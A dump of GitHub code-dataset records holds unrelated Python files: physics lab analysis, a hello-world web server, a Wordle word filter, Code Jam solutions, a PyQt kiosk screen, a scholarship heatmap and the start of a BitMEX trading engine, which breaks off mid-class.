find_hkl('ZnS', ZnS_n, 7)\n print(ZnS_h, ZnS_k, ZnS_l)\n print(\"ZnS a:\")\n print(ZnS_a)\n print(\"CsCl n=sqrt(h**2+k**2+l**2):\")\n CsCl_n, CsCl_a = find_lattice_constants(d, 'CsCl', 7)\n print(CsCl_n)\n print('CsCl h, k, l:')\n CsCl_h, CsCl_k, CsCl_l = 
find_hkl('CsCl', CsCl_n, 7)\n print(CsCl_h, CsCl_k, CsCl_l)\n print(\"CsCl a:\")\n print(CsCl_a)\n print(\"NaCl n=sqrt(h**2+k**2+l**2):\")\n NaCl_n, NaCl_a = find_lattice_constants(d, 'NaCl', 7)\n print(NaCl_n)\n print('NaCl h, k, l:')\n NaCl_h, NaCl_k, NaCl_l = find_hkl('NaCl', NaCl_n, 7)\n print(NaCl_h, NaCl_k, NaCl_l)\n print(\"NaCl a:\")\n print(NaCl_a)\n print(\"F n=sqrt(h**2+k**2+l**2):\")\n F_n, F_a = find_lattice_constants(d, 'F', 7)\n print(F_n)\n print('F h, k, l:')\n F_h, F_k, F_l = find_hkl('F', F_n, 7)\n print(F_h, F_k, F_l)\n print(\"F a:\")\n print(F_a)\n\n np.savetxt(\"Auswertung/Grafiken/\" + Probe.name +\n \"_ZnS_CsCl_Tabelle.tex\",\n np.column_stack([\n PeakAngle,\n ZnS_n**2,\n ZnS_h,\n ZnS_k,\n ZnS_l,\n ZnS_a * 10**(12),\n CsCl_n**2,\n CsCl_h,\n CsCl_k,\n CsCl_l,\n CsCl_a * 10**(12),\n ]), delimiter=' & ', newline=r' \\\\' + '\\n',\n fmt='%.2f & %.0f & %.0f & %.0f & %.0f & %.2f & %.0f & %.0f & %.0f & %.0f & %.2f')\n np.savetxt(\"Auswertung/Grafiken/\" + Probe.name +\n \"_NaCl_F_Tabelle.tex\",\n np.column_stack([\n PeakAngle,\n NaCl_n**2,\n NaCl_h,\n NaCl_k,\n NaCl_l,\n NaCl_a * 10**(12),\n F_n**2,\n F_h,\n F_k,\n F_l,\n F_a * 10**(12),\n ]), delimiter=' & ', newline=r' \\\\' + '\\n',\n fmt='%.2f & %.0f & %.0f & %.0f & %.0f & %.2f & %.0f & %.0f & %.0f & %.0f & %.2f')\n\n # Compute best_fit for a thrugh linear regression\n ZnS_params, cov = curve_fit(linear, np.cos(0.5 * PeakAngle * np.pi /\n 180)**2, ZnS_a)\n ZnS_errors = np.sqrt(np.diag(cov))\n m_ZnS = ufloat(ZnS_params[0], ZnS_errors[0])\n n_ZnS = ufloat(ZnS_params[1], ZnS_errors[1])\n\n CsCl_params, cov = curve_fit(linear, np.cos(0.5 * PeakAngle * np.pi /\n 180)**2, CsCl_a)\n CsCl_errors = np.sqrt(np.diag(cov))\n m_CsCl = ufloat(CsCl_params[0], CsCl_errors[0])\n n_CsCl = ufloat(CsCl_params[1], CsCl_errors[1])\n\n NaCl_params, cov = curve_fit(linear, np.cos(0.5 * PeakAngle * np.pi /\n 180)**2, NaCl_a)\n NaCl_errors = np.sqrt(np.diag(cov))\n m_NaCl = ufloat(NaCl_params[0], NaCl_errors[0])\n n_NaCl = ufloat(NaCl_params[1], NaCl_errors[1])\n\n F_params, cov = curve_fit(linear, np.cos(0.5 * PeakAngle * np.pi /\n 180)**2, F_a)\n F_errors = np.sqrt(np.diag(cov))\n m_F = ufloat(F_params[0], F_errors[0])\n n_F = ufloat(F_params[1], F_errors[1])\n\n print(\"ZnS best fit:\")\n print(\"m = \", m_ZnS, \", n = \", n_ZnS)\n print(\"CsCl best fit:\")\n print(\"m = \", m_CsCl, \", n = \", n_CsCl)\n print(\"NaCl best fit:\")\n print(\"m = \", m_NaCl, \", n = \", n_NaCl)\n print(\"F best fit:\")\n print(\"m = \", m_F, \", n = \", n_F)\n\n x_range = np.linspace(0, 90, 1000)\n x_range = np.cos(x_range * np.pi / 180)**2\n\n # Plot peaks\n plt.figure()\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, ZnS_a * 10**(12),\n marker='x', color='blue', ls='')\n plt.plot(x_range, linear(x_range, *ZnS_params) * 10**(12),\n ls='-', color='blue', label='Hypothese: ZnS-Gitter')\n plt.xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n plt.ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n plt.legend(loc=\"best\")\n plt.xlim(0, 1)\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_ZnS_Ausgleichsrechnung.pdf\")\n\n plt.figure()\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, CsCl_a * 10**(12),\n marker='x', color='green', ls='')\n plt.plot(x_range, linear(x_range, *CsCl_params) * 10**(12),\n ls='-', color='green', label='Hypothese: CsCl-Gitter')\n plt.xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n plt.ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n plt.legend(loc=\"best\")\n plt.xlim(0, 1)\n plt.tight_layout\n 
plt.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_CsCl_Ausgleichsrechnung.pdf\")\n\n plt.figure()\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, NaCl_a * 10**(12),\n marker='x', color='orange', ls='')\n plt.plot(x_range, linear(x_range, *NaCl_params) * 10**(12),\n ls='-', color='orange', label='Hypothese: NaCl-Gitter')\n plt.xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n plt.ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n plt.legend(loc=\"best\")\n plt.xlim(0, 1)\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_NaCl_Ausgleichsrechnung.pdf\")\n\n plt.figure()\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, F_a * 10**(12),\n marker='x', color='black', ls='')\n plt.plot(x_range, linear(x_range, *F_params) * 10**(12),\n ls='-', color='black', label='Hypothese: F-Gitter')\n plt.xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n plt.ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n plt.legend(loc=\"best\")\n plt.xlim(0, 1)\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_F_Ausgleichsrechnung.pdf\")\n\n fig = plt.figure()\n ax = plt.subplot(111)\n ax.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, ZnS_a * 10**(12),\n marker='x', color='blue', ls='')\n ax.plot(x_range, linear(x_range, *ZnS_params) * 10**(12),\n ls='-', color='blue', label='Hypothese: ZnS-Gitter')\n ax.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, CsCl_a * 10**(12),\n marker='x', color='green', ls='')\n ax.plot(x_range, linear(x_range, *CsCl_params) * 10**(12),\n ls='-', color='green', label='Hypothese: CsCl-Gitter')\n ax.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, NaCl_a * 10**(12),\n marker='x', color='orange', ls='')\n ax.plot(x_range, linear(x_range, *NaCl_params) * 10**(12),\n ls='-', color='orange', label='Hypothese: NaCl-Gitter')\n ax.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, F_a * 10**(12),\n marker='x', color='black', ls='')\n ax.plot(x_range, linear(x_range, *F_params) * 10**(12),\n ls='-', color='black', label='Hypothese: F-Gitter')\n ax.set_xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n ax.set_ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n art = []\n lgd = pylab.legend(loc=\"upper center\", bbox_to_anchor=(0.5, -0.1), ncol=2)\n art.append(lgd)\n ax.set_xlim(0, 1)\n plt.tight_layout\n pylab.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_Ausgleichsrechnung.pdf\",\n additional_artists=art,\n bbox_inches=\"tight\")\n\nprint(\"------------------------------------------------------------------\")\nprint('Thats all folks!')\n","repo_name":"FeGeyer/praktikum","sub_path":"MFP/DebyeV41/auswertung.py","file_name":"auswertung.py","file_ext":"py","file_size_in_byte":27907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27557763147","text":"#!/usr/bin/python3\nimport os\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n\nmessage = os.getenv('APPENV', 'Default Hello World!')\n\nclass handler(BaseHTTPRequestHandler):\n\n def do_GET(self):\n self.send_response(200)\n self.send_header('Content-type','text/html')\n self.end_headers()\n\n self.wfile.write(bytes(message, \"utf8\"))\n\nprint(\"I will show you message:\", message)\n\nwith HTTPServer(('', 8080), handler) as server:\n server.serve_forever()\n","repo_name":"apoczekalewicz/app-python-helloworld","sub_path":"src/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73643612035","text":"from ctypes 
import sizeof\nimport sys\n\nfname = sys.argv[1];\nfname_filter = fname + \".wslv\"\nwith open(fname) as f:\n with open(fname_filter,\"w\") as ff:\n for line in f:\n sline = line.rstrip()\n if(len(sline) == 5):\n ff.write(sline.lower())\n ff.write(\"\\n\")\n\n","repo_name":"federicorossifr/wordle-solver","sub_path":"filterWords.py","file_name":"filterWords.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6092867795","text":"import os\nfrom skimage import io\nimport plotly.express as px\nimport matplotlib.pyplot as plt\nimport pyximport\npyximport.install(language_level=3)\n#import dash_interactive_graphviz\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\nfrom sims.sgs import load_SGS\n\nfrom main_sims_places_test import get_maximal_itemsets\nfrom sims.graph_utils import json_to_graphviz\nfrom sims.sims_config import SImS_config\n\n\ndef create_figure(path, name):\n fig = px.imshow(io.imread(path), width=300, )\n fig.update_layout({'hovermode': False, 'margin' : dict(l=20, r=20, t=20, b=20)})\n\n graph = dcc.Graph(id=name, figure=fig, animate=False,\n style={'width': '300px', 'float': 'left', 'display': 'block'},\n config={'displayModeBar': False, 'scrollZoom': True})\n return graph\n\ndef create_figures(n):\n files = os.listdir(os.path.join(config.SGS_dir, 'charts/sgs_eprune_nprune_gspan_05/'))\n figures = []\n i = 0\n for file in files:\n if i >= n: break\n if file.endswith('.jpg'):\n figures.append(create_figure(os.path.join(config.SGS_dir, 'charts/sgs_eprune_nprune_gspan_05/', file),\n f'chart{i}'))\n i += 1\n return figures\n\n\nif __name__ == '__main__':\n # import plotly.graph_objs as go\n # layout = go.Layout(\n # margin=go.layout.Margin(\n # l=0, # left margin\n # r=0, # right margin\n # b=0, # bottom margin\n # t=0 # top margin\n # )\n # )\n\n\n\n config = SImS_config('COCO_subset2')\n config.SGS_params['minsup']=0.05\n fgraphs = load_SGS(config)\n maximal_fgraphs = get_maximal_itemsets(fgraphs)\n\n # components = [html.Div(children=dash_interactive_graphviz.DashInteractiveGraphviz(id=f\"graph{i}\",\n # dot_source=json_to_graphviz(g['g']).source),\n # style = {'width': '200px', 'float': 'left', 'display': 'block'})\n # for i,g in enumerate(maximal_fgraphs)]\n app = dash.Dash(__name__)\n\n\n\n #fig = px.scatter(x=[0, 1, 2, 3, 4], y=[0, 1, 4, 9, 16])\n #fig = plt.scatter(x=[0, 1, 2, 3, 4], y=[0, 1, 4, 9, 16])\n\n # To remove toolbar options:\n # config={\n # 'modeBarButtonsToRemove': ['pan2d', 'lasso2d']\n # }\n\n elements = [\n html.H1(\"SImS, SGS generation.\", style={'text-align': 'center'}),\n html.Div([html.Caption('Select COCO subset:', style={'float':'left', 'width':'300px'}), html.Textarea()], style={'width':'800px'}),\n html.H1(\"SImS, SGS exploration.\", style={'text-align' : 'center'}),\n dcc.Dropdown(id='choice', options=[{'label':'5', 'value':5},{'label':'10', 'value':10}],\n value=5, multi=False),\n html.Div(create_figures(5), id='figuresDiv')\n ]\n\n app.layout = html.Div(elements)\n\n @app.callback(\n [Output(component_id='figuresDiv', component_property='children')],\n [Input(component_id='choice', component_property='value')]\n )\n def update_graph(option):\n return (create_figures(option),)\n\n\n 
app.run_server(debug=True)","repo_name":"AndreaPasini/panoptic-segmentation","sub_path":"main_sims_DEMO.py","file_name":"main_sims_DEMO.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23588264641","text":"T = int(input())\n\nfor t in range(T):\n N, K = list(map(int, input().split()))\n u = float(input())\n p = list(map(float, input().split()))\n p = sorted(p)\n p.append(1.)\n last_p = p[0]\n for i in range(1, N+1):\n dif = min(p[i] - last_p, u/i)\n u -= dif*i\n last_p += dif\n #print(dif, last_p)\n if u < 0.0000001 or i == N:\n for j in range(i):\n p[j] = last_p\n break\n\n p = p[:-1]\n ans = 1.\n for x in p:\n ans *= x\n\n print('Case #{0:d}: {1:.10f}'.format(t+1, ans))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_211/196.py","file_name":"196.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7857314047","text":"from datetime import datetime\nimport time\n\nen_de = {\"Monday\" : \"Montach\",\"Tuesday\" : \"Dienstach\",\"Wednesday\":\"Medig\", \"Thursday\":\"Donschtig\",\"Friday\":\"Freitach\",\"Saturday\":\"Sonnabend\",\"Sunday\":\"Sonntach\"}\n\nprint(\"Hey Bruder! Du sagst mir Datum. Ich sag dir Tag!\\n\")\nprint(\"Sagst du Datum!\\n\")\ny = int(input(\"Jahr: \"))\nm = int(input(\"Monat: \"))\nt = int(input(\"Tag: \"))\n\nprint(\"\\nGib mir 5 Sekunden.\\n\")\nfor i in range(0,5):\n\ttime.sleep(1)\n\tprint(i+1)\ntime.sleep(1)\n\ndate = datetime(y, m, t)\nx = date.strftime(\"%A\")\n\nprint(\"\\nResultat: %s. Üsch schwööör!\"%(en_de[x]))\n\n\n\n\n\n\n","repo_name":"thstoet/Unit_Test","sub_path":"05_Programs/day.py","file_name":"day.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23625857391","text":"#!/usr/local/bin/python2.7\n# -*- coding: utf-8 -*-\n\nimport sys\n\ndef debug(a): sys.stderr.write(str(a) + '\\n')\ndef readarray(foo): return [foo(e) for e in raw_input().split()]\ndef readint(): return int(raw_input().strip())\n\ndebug = lambda x: x\n\ndef calc(data, D):\n results = []\n for i in xrange(len(data)):\n for j in xrange(i + 1, len(data) + 1):\n some_range = data[i:j]\n expected = (sum(e[1] for e in some_range) - 1) * D\n positions = [e[0] for e in some_range]\n actual = max(positions) - min(positions)\n results.append((expected - actual) / 2.0)\n return max(results)\n\nT = readint()\nfor i in xrange(T):\n C, D = readarray(int)\n data = []\n for j in xrange(C):\n P, V = readarray(int)\n data.append((P, V))\n data.sort(key=lambda x: x[0])\n debug(data)\n print('Case #{0}: {1}'.format(i + 1, calc(data, D)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_82/28.py","file_name":"28.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29670319607","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QLabel\nfrom PyQt5.QtCore import QCoreApplication\nfrom PyQt5.QtGui import QPixmap\nimport login\nimport join\n\nclass startApp(QWidget):\n def __init__(self):\n super().__init__()\n self.initUi()\n\n def initUi(self):\n self.back = QLabel(self)\n self.back.setGeometry(0, 1, 851, 1201)\n self.pixmap = QPixmap(\"image/back_image/start_back.jpg\")\n 
self.back.setPixmap(self.pixmap)\n\n self.login_lb = QLabel(self)\n self.login_lb.move(220, 500)\n self.pixmap = QPixmap(\"image/btn_image/login_btn.png\")\n self.login_lb.setPixmap(self.pixmap)\n\n self.join_lb = QLabel(self)\n self.join_lb.move(220, 750)\n self.pixmap = QPixmap(\"image/btn_image/join_btn.png\")\n self.join_lb.setPixmap(self.pixmap)\n\n loginbtn = QPushButton(self)\n loginbtn.clicked.connect(self.clickLoginBtn)\n loginbtn.setStyleSheet(\"background-color:rgb(0,0,0,0);\")\n loginbtn.resize(550, 150)\n loginbtn.move(220, 500)\n\n joinbtn = QPushButton(self)\n joinbtn.clicked.connect(self.clickJoinBtn)\n joinbtn.setStyleSheet(\"background-color:rgb(0,0,0,0);\")\n joinbtn.resize(550, 150)\n joinbtn.move(220, 750)\n\n self.resize(850, 1200)\n self.show()\n\n def clickLoginBtn(self):\n self.close()\n self.l = login.Login()\n\n def clickJoinBtn(self):\n self.close()\n self.l = join.Join()","repo_name":"calmPOTATO/Pocket_kiosk","sub_path":"appStart.py","file_name":"appStart.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72397800834","text":"import pandas as pd\nimport seaborn as sns\nimport folium\nfrom folium import plugins\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom unicodedata import normalize\nimport os\n\nPROUNI_FILE = 'pda-prouni-2016.csv'\nMUNICIPIOS_FILE = 'MunicipiosBrasil.csv'\n\nENCODING = 'ISO-8859-1'\n\nSEP = ';'\n\nMUN_MUNICIPIO_COL = 'MUNICIPIO'\nMUN_UF_COL = 'UF'\nMUN_LATITUDE_COL = 'LATITUDE'\nMUN_LONGITUDE_COL = 'LONGITUDE'\n\nPRO_MUNICIPIO_BENEFICIARIO_BOLSA_COL = 'MUNICIPIO_BENEFICIARIO_BOLSA'\n\nQUANTIDADE_OCORRENCIAS_CIDADE_COL = 'QUANTIDADE_OCORRENCIAS_CIDADE'\n\nLATITUDE_PAIS = -15.788497\nLONGITUDE_PAIS = -47.879873\n\nFILE_PATH = os.getcwd() + \"\\\\\"\n\ndef remover_acentos(txt):\n return normalize('NFKD', txt).encode('ASCII', 'ignore').decode('ASCII')\n\nprouni_2016 = pd.read_csv(FILE_PATH + PROUNI_FILE, \n sep = SEP, \n encoding = ENCODING)\n\nmunicipios_brasil = pd.read_csv(FILE_PATH + MUNICIPIOS_FILE, \n usecols = [MUN_MUNICIPIO_COL, \n MUN_UF_COL, \n MUN_LATITUDE_COL, \n MUN_LONGITUDE_COL], \n sep = SEP, \n encoding = ENCODING)\n\nprouni_2016 = prouni_2016.fillna('')\n\nmunicipios_brasil = municipios_brasil.fillna('')\n\nmunicipios_brasil[MUN_LATITUDE_COL] = municipios_brasil[MUN_LATITUDE_COL].apply(lambda x: (x.replace(',','.'))\n .strip())\n\nmunicipios_brasil[MUN_LATITUDE_COL] = municipios_brasil[MUN_LATITUDE_COL].astype(float)\n\nmunicipios_brasil[MUN_LONGITUDE_COL] = municipios_brasil[MUN_LONGITUDE_COL].apply(lambda x: (x.replace(',','.')).strip())\n\nmunicipios_brasil[MUN_LONGITUDE_COL] = municipios_brasil[MUN_LONGITUDE_COL].astype(float)\n\nprouni_2016[PRO_MUNICIPIO_BENEFICIARIO_BOLSA_COL] = prouni_2016[\n PRO_MUNICIPIO_BENEFICIARIO_BOLSA_COL\n].apply(lambda x: remover_acentos(x))\n\ndf_gerar_mapa = pd.merge(prouni_2016.drop_duplicates(), \n municipios_brasil.drop_duplicates(), \n left_on = ['MUNICIPIO_BENEFICIARIO_BOLSA', 'SIGLA_UF_BENEFICIARIO_BOLSA'], \n right_on = [MUN_MUNICIPIO_COL, MUN_UF_COL], \n how = 'left')\n\ndf_gerar_mapa = df_gerar_mapa[(~df_gerar_mapa[MUN_LATITUDE_COL].isnull()) \n | (~df_gerar_mapa[MUN_LONGITUDE_COL].isnull())]\n\ndf_municipio_bolsa = df_gerar_mapa.assign(QUANTIDADE_OCORRENCIAS_CIDADE = \n df_gerar_mapa.groupby(PRO_MUNICIPIO_BENEFICIARIO_BOLSA_COL)\n .MUNICIPIO_BENEFICIARIO_BOLSA.transform('count'))\n\ndf_municipio_bolsa = df_municipio_bolsa.sort_values(\n 
[QUANTIDADE_OCORRENCIAS_CIDADE_COL, \n PRO_MUNICIPIO_BENEFICIARIO_BOLSA_COL], \n ascending = [True, False])\n\ncoordenadas = []\nlat = df_municipio_bolsa[MUN_LATITUDE_COL][:500].values\nlong = df_municipio_bolsa[MUN_LONGITUDE_COL][:500].values\n\nmapa = folium.Map(\n location = [LATITUDE_PAIS, LONGITUDE_PAIS], \n tiles = 'Stamen Toner', \n zoom_start = 4)\n\nfor la, lo in zip(lat, long):\n coordenadas.append([la, lo])\n\nmapa.add_child(plugins.HeatMap(coordenadas))\n\nmapa","repo_name":"ibragionp/analise_de_dados_mec","sub_path":"analise_dados_mec_2016.py","file_name":"analise_dados_mec_2016.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40745972214","text":"#! /usr/bin/env python3.9\n\n########################################################################################################################\n# Imports\n########################################################################################################################\n\nimport argparse\nimport asyncio\nfrom collections import defaultdict, deque, OrderedDict\nfrom dataclasses import dataclass\nfrom enum import IntEnum\nfrom getpass import getpass\nimport json\nimport logging\nimport math\nfrom pathlib import Path\nimport re\nimport time\nfrom typing import Any, Callable, Generic, Optional, TypeVar, Union\n\nimport bitmex # type: ignore[import]\nfrom bitmex_websocket import BitMEXWebsocket # type: ignore[import]\n\n\n########################################################################################################################\n# Globals\n########################################################################################################################\n\nlogger = logging.getLogger(__name__)\n\n\n########################################################################################################################\n# Utilities\n########################################################################################################################\n\nBASE64URL_PATTERN = re.compile(r'^[-0-9A-Z_a-z]+$')\nTICKER_BASIC_SYMBOL_PATTERN = re.compile(r'^[A-Z]+$')\nTICKER_EXTENDED_SYMBOL_PATTERN = re.compile(r'^[A-Za-z]+$')\n\n\ndef assert_base64url(value: Any) -> str:\n assert isinstance(value, str) and BASE64URL_PATTERN.match(value)\n return value\n\n\ndef assert_bool(value: Any) -> bool:\n assert isinstance(value, bool)\n return value\n\n\ndef assert_diminishing_multiplier(value: Any) -> float:\n assert isinstance(value, float) and 0. < value < 1.\n return value\n\n\ndef assert_non_diminishing_multiplier(value: Any) -> float:\n assert isinstance(value, float) and value >= 1.\n return value\n\n\ndef assert_non_negative_integer(value: Any) -> int:\n assert isinstance(value, int) and value >= 0\n return value\n\n\ndef assert_positive_integer(value: Any) -> int:\n assert isinstance(value, int) and value > 0\n return value\n\n\ndef assert_positive_percentage(value: Any) -> float:\n assert isinstance(value, float) and 0. 
< value <= 1.\n return value\n\n\ndef assert_positive_real(value: Any) -> float:\n assert isinstance(value, float) and value > 0.\n return value\n\n\ndef assert_ticker_basic_symbol(value: Any) -> str:\n assert isinstance(value, str) and TICKER_BASIC_SYMBOL_PATTERN.match(value)\n return value\n\n\ndef assert_ticker_extended_symbol(value: Any) -> str:\n assert isinstance(value, str) and TICKER_EXTENDED_SYMBOL_PATTERN.match(value)\n return value\n\n\n########################################################################################################################\n# Types\n########################################################################################################################\n\nclass Signal(IntEnum):\n BUY = 1\n SELL = -1\n CLOSE = 0\n BUYCLOSE = -1\n SELLCLOSE = 1\n\n\n@dataclass(order=True, frozen=True)\nclass OrderBookLevel:\n # TODO: Use `@dataclass(slots=True)` once we're on Python 3.10.\n __slots__ = ('price', 'volume')\n\n price: float\n volume: int\n\n\n@dataclass(frozen=True)\nclass L2OrderBookTick:\n # TODO: Use `@dataclass(slots=True)` once we're on Python 3.10.\n __slots__ = ('monotonic_timestamp_ns', 'midpoint_price', 'bids', 'asks')\n\n monotonic_timestamp_ns: int\n midpoint_price: float\n bids: list[OrderBookLevel]\n asks: list[OrderBookLevel]\n\n\n@dataclass(frozen=True)\nclass HackyMcHackface:\n # TODO: Use `@dataclass(slots=True)` once we're on Python 3.10.\n __slots__ = ('midpoint_price', 'best_bid', 'best_ask')\n\n midpoint_price: float\n best_bid: Optional[float]\n best_ask: Optional[float]\n\n\n@dataclass(frozen=True)\nclass ExponentialMovingAverageResult:\n __slots__ = ('current_value', 'best_bid', 'best_ask', 'mean', 'variance', 'sma_mean', 'sma_variance')\n\n current_value: float\n best_bid: Optional[float]\n best_ask: Optional[float]\n mean: float\n variance: float\n sma_mean: float\n sma_variance: float\n\n\n########################################################################################################################\n# Nodes\n########################################################################################################################\n\nNCT = TypeVar('NCT')\nNRT = TypeVar('NRT')\n\n\nclass Node(Generic[NCT, NRT]):\n __slots__ = ('engine', 'config')\n\n def __init__(self, engine: 'Engine', config: NCT) -> None:\n self.engine = engine\n self.config = config\n\n def publish_result(self, result: NRT) -> None:\n logger.debug(f'Publishing {result} from node for {self.config}.')\n self.engine.publish_node_result(self, result)\n\n\n# Absolute duration (in seconds) between when a timer tick is scheduled and when it is invoked, above which a warning\n# will be emitted.\nTIMER_TICK_EPSILON = 0.02\n\n\n@dataclass(frozen=True)\nclass TimerNodeConfig:\n __slots__ = ('duration',)\n\n duration: float\n\n def __post_init__(self) -> None:\n assert_positive_real(self.duration)\n\n\nclass TimerNode(Node[TimerNodeConfig, int]):\n __slots__ = ('epoch_timestamp', 'next_tick_timestamp', 'ticks')\n\n def __init__(self, engine: 'Engine', config: TimerNodeConfig) -> None:\n super().__init__(engine, config)\n self.epoch_timestamp = engine.loop.time()\n self.ticks = 0\n self.schedule_next_tick()\n\n def schedule_next_tick(self) -> None:\n current_timestamp = self.engine.loop.time()\n next_tick = self.ticks + 1\n self.next_tick_timestamp = self.epoch_timestamp + (self.config.duration * next_tick)\n delta = current_timestamp - self.next_tick_timestamp\n if delta > 0:\n logger.warning(f'Next tick #{next_tick} (from node for {self.config}) is late by 
{delta} s!')\n self.engine.loop.call_at(self.next_tick_timestamp, self.handle_tick)\n\n def handle_tick(self) -> None:\n current_timestamp = self.engine.loop.time()\n delta = current_timestamp - self.next_tick_timestamp\n is_late = abs(delta) > TIMER_TICK_EPSILON\n\n self.ticks += 1\n\n message = f'Scheduled tick #{self.ticks} (from node for {self.config}) invoked '\n if delta == 0:\n message += 'on time!'\n else:\n message += f'''{abs(delta)} s ({'>' if is_late else '≤'} {TIMER_TICK_EPSILON} s) {'late' if delta >= 0 else 'early'}.'''\n if is_late:\n logger.warning(message)\n else:\n logger.debug(message)\n\n self.publish_result(self.ticks)\n self.schedule_next_tick()\n\n\n@dataclass(frozen=True)\nclass L2OrderBookTickNodeConfig:\n __slots__ = ()\n\n\nclass L2OrderBookTickNode(Node[L2OrderBookTickNodeConfig, L2OrderBookTick]):\n __slots__ = ()\n\n def __init__(self, engine: 'Engine', config: L2OrderBookTickNodeConfig) -> None:\n super().__init__(engine, config)\n engine.loop.create_task(self.drain_queue())\n\n async def drain_queue(self) -> None:\n while True:\n tick = await self.engine.l2_order_book_tick_queue.get()\n self.publish_result(tick)\n\n\n@dataclass(frozen=True)\nclass DiscretisedL2OrderBookTickNodeConfig:\n __slots__ = ('duration',)\n\n duration: float\n\n def __post_init__(self) -> None:\n assert_positive_real(self.duration)\n\n\nclass DiscretisedL2OrderBookTickNode(Node[DiscretisedL2OrderBookTickNodeConfig, L2OrderBookTick]):\n __slots__ = ('last_timer_tick', 'last_l2_order_book_tick')\n\n def __init__(self, engine: 'Engine', config: DiscretisedL2OrderBookTickNodeConfig) -> None:\n super().__init__(engine, config)\n self.last_timer_tick: Optional[int] = None\n self.last_l2_order_book_tick: Optional[L2OrderBookTick] = None\n engine.subscribe_node_result(TimerNodeConfig(duration=config.duration), self.handle_timer_tick)\n engine.subscribe_node_result(L2OrderBookTickNodeConfig(), self.handle_l2_order_book_tick)\n\n def handle_timer_tick(self, tick: int) -> None:\n assert self.last_timer_tick is None or tick == self.last_timer_tick + 1\n self.last_timer_tick = tick\n if self.last_l2_order_book_tick is not None:\n self.publish_result(self.last_l2_order_book_tick)\n\n def handle_l2_order_book_tick(self, tick: L2OrderBookTick) -> None:\n self.last_l2_order_book_tick = tick\n\n\n@dataclass(frozen=True)\nclass MidpointPriceNodeConfig:\n __slots__ = ('l2_order_book_tick_node_config',)\n\n l2_order_book_tick_node_config: Union[L2OrderBookTickNodeConfig, DiscretisedL2OrderBookTickNodeConfig]\n\n\nclass MidpointPriceNode(Node[MidpointPriceNodeConfig, HackyMcHackface]):\n __slots__ = ()\n\n def __init__(self, engine: 'Engine', config: MidpointPriceNodeConfig) -> None:\n super().__init__(engine, config)\n engine.subscribe_node_result(config.l2_order_book_tick_node_config, self.handle_l2_order_book_tick)\n\n def handle_l2_order_book_tick(self, tick: L2OrderBookTick) -> None:\n best_bid = tick.bids[0].price if len(tick.bids) > 0 else None\n best_ask = tick.asks[0].price if len(tick.asks) > 0 else None\n self.publish_result(HackyMcHackface(midpoint_price=tick.midpoint_price, best_bid=best_bid, best_ask=best_ask))\n\n\n@dataclass(frozen=True)\nclass ExponentialMovingAverageNodeConfig:\n __slots__ = ('node_config', 'alpha', 'sma_lookback')\n\n node_config: Any\n alpha: float\n sma_lookback: int\n\n def __post_init__(self) -> None:\n assert_diminishing_multiplier(self.alpha)\n assert_positive_integer(self.sma_lookback)\n\n\nclass 
